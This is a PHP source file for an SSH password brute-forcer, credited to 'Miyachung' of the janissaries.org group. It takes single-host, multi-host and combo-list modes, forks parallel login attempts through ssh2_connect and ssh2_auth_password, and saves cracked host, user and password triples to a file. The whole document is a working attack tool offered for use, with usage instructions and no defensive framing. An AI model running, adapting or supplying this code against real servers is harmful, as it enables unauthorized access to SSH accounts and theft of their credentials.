SSH Cracker Root

1. SSH Cracker <?php
2. /*
3. .__ .__
4. _____ |__|___.__._____ ____ | |__ __ __ ____ ____
5. / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
6. | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
7. |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
8. \/ \/ \/ \/ \/ \//_____/
9. * SSH Brute-Forcer
10. * Written by Miyachung
11. * Homepage : http://janissaries.org
12. * Youtube Channel: http://www.youtube.com/janissariesorg
13. * Usage : http://www.youtube.com/watch?v=h5Fx3PBjUCg
14. * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended)
15. * @@ This tool is using process forking system
16. * All rights reserved
17. * Contact with coder: miyachung@hotmail.com or jabber.org
18. */
19. error_reporting(0);
20. /*
21. * Call the class
22. */
23. $SSH = new SSHBruter();
24. /*
25. * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed
26. * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool
27. */
28. if(!function_exists("ssh2_connect"))
29. {
30. $SSH->showErrorMsg(1);
31. }
32. elseif(!function_exists("pcntl_fork"))
33. {
34. $SSH->showErrorMsg(2);
35. }
36. /*
37. * Parse arguments
38. * There is 3 way to brute
39. * Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
40. * Combolist : -c <combolist> -o <output> -t <thread>
41. * Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
42. */
43. $options_single = getopt("h:u:w:o:t:");
44. $options_combo = getopt("c:o:t:");
45. $options_multi = getopt("f:u:w:o:t:");
46. /*
47. * Does arguments control!
48. */
49. if($options_single)
50. {
51. if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null)
52. {
53. $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] );
54. }
55. else{
56. $SSH->showErrorMsg(3);
57. }
58. }
59. elseif($options_combo)
60. {
61. if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null)
62. {
63. $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] );
64. }
65. else{
66. $SSH->showErrorMsg(3);
67. }
68. }
69. elseif($options_multi)
70. {
71. if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null)
72. {
73. $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] );
74. }
75. else{
76. $SSH->showErrorMsg(3);
77. }
78. }
79. else
80. {
81. $SSH->showErrorMsg(3);
82. }
83.  
84. class SSHBruter
85. {
86. /*
87. * Prints 'MAIN_MESSAGE' if arguments used wrong
88. */
89. const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n*********************************************\n";
90. /*
91. * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found
92. */
93. const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n";
94. /*
95. * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found
96. */
97. const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n";
98. /*
99. * Prints 'ARGMISS' if arguments not specified
100. */
101. const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n";
102. /*
103. * Counts hosts & passwords , increments in foreach loop
104. */
105. private $counter = 0;
106. /*
107. * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
108. */
109. function SingleBrute( $host , $user, $wordlist, $output , $thread )
110. {
111. echo "\n";
112. echo "Host: ".$host."\n";
113. echo "User: ".$user."\n\n";
114. $chunk_wordlist = array_chunk( file($wordlist) , $thread );
115. foreach($chunk_wordlist as $passwords)
116. {
117. foreach($passwords as $password)
118. {
119. $this->counter++;
120. $fork = pcntl_fork();
121. if(!$fork)
122. {
123. $perform_single = $this->SSH( $host , $user , trim($password) , $output );
124. if($perform_single)
125. {
126. print "Sleeping 120 seconds , PRESS CTRL + C NOW!";
127. sleep(120);
128. }
129. exit;
130. }
131. }
132. $this->waitForThreadFinish();
133. }
134.  
135. }
136. /*
137. * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread>
138. */
139. function ComboBrute( $combolist , $output , $thread )
140. {
141. $chunk_combolist = array_chunk( file($combolist) , $thread);
142. foreach($chunk_combolist as $combo)
143. {
144. foreach($combo as $hostuserpwd)
145. {
146. $this->counter++;
147. list($host,$user,$password) = split(":",trim($hostuserpwd));
148. $fork = pcntl_fork();
149. if(!$fork)
150. {
151. $this->SSH( $host , $user , $password , $output );
152. exit;
153. }
154.  
155. }
156. $this->waitForThreadFinish();
157. }
158.  
159. }
160. /*
161. * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
162. */
163. function MultiBrute( $hostlist , $user , $wordlist , $output , $thread )
164. {
165. foreach(file($hostlist) as $host)
166. {
167. $chunk_wordlist = array_chunk( file($wordlist) , $thread );
168. foreach($chunk_wordlist as $passwords)
169. {
170. foreach($passwords as $password)
171. {
172. $this->counter++;
173. $fork = pcntl_fork();
174. if(!$fork)
175. {
176. $this->SSH( trim($host) , $user , trim($password) , $output );
177. exit;
178. }
179.  
180. }
181. $this->waitForThreadFinish();
182. }
183. }
184. }
185. /*
186. * Performs login to host with specified user and password(s)
187. */
188. function SSH( $host , $user , $password , $output , $port = 22 )
189. {
190. $connect = ssh2_connect( $host , $port );
191. if(!$connect)
192. {
193. print "[".$this->counter."] Host: ".$host." Connection Failed\n";
194. flush();
195. break;
196. }
197. else
198. {
199. $auth = ssh2_auth_password( $connect , $user , $password );
200. if($auth)
201. {
202. $a = "*********************************************\n";
203. $a.= "[+] Found!\n";
204. $a.= "[+] Host: ".$host."\n";
205. $a.= "[+] User: ".$user."\n";
206. $a.= "[+] Password: ".$password."\n";
207.  
208. print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n*********************************************\n";
209. self::SaveResult( $output , $a );
210. return true;
211. }
212. else
213. {
214. print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n";
215. flush();
216. break;
217. }
218.  
219. }
220.  
221. }
222. /*
223. * All error messages showing from there
224. */
225. function showErrorMsg( $errno )
226. {
227. print self::MAIN_MESSAGE;
228. if($errno == 1)
229. {
230. print self::NOT_INSTALLED_SSH;
231. exit;
232. }
233. if($errno == 2)
234. {
235. print self::NOT_INSTALLED_PCNTL;
236. exit;
237. }
238. if($errno == 3)
239. {
240. print self::ARGMISS;
241. exit;
242. }
243.  
244. }
245. /*
246. * Waits for threads to finish
247. */
248. function waitForThreadFinish()
249. {
250. while (pcntl_waitpid(0, $status) != -1) {
251. $status = pcntl_wexitstatus($status);
252. }
253. }
254. /*
255. * Saves everything with this function
256. */
257. static function SaveResult( $output,$text )
258. {
259. $open_file = fopen( $output , "a" );
260. fwrite( $open_file , $text );
261. fclose( $open_file );
262. }
263. }
264.  
265. # miyachung represents / janissaries.org group
266. ?>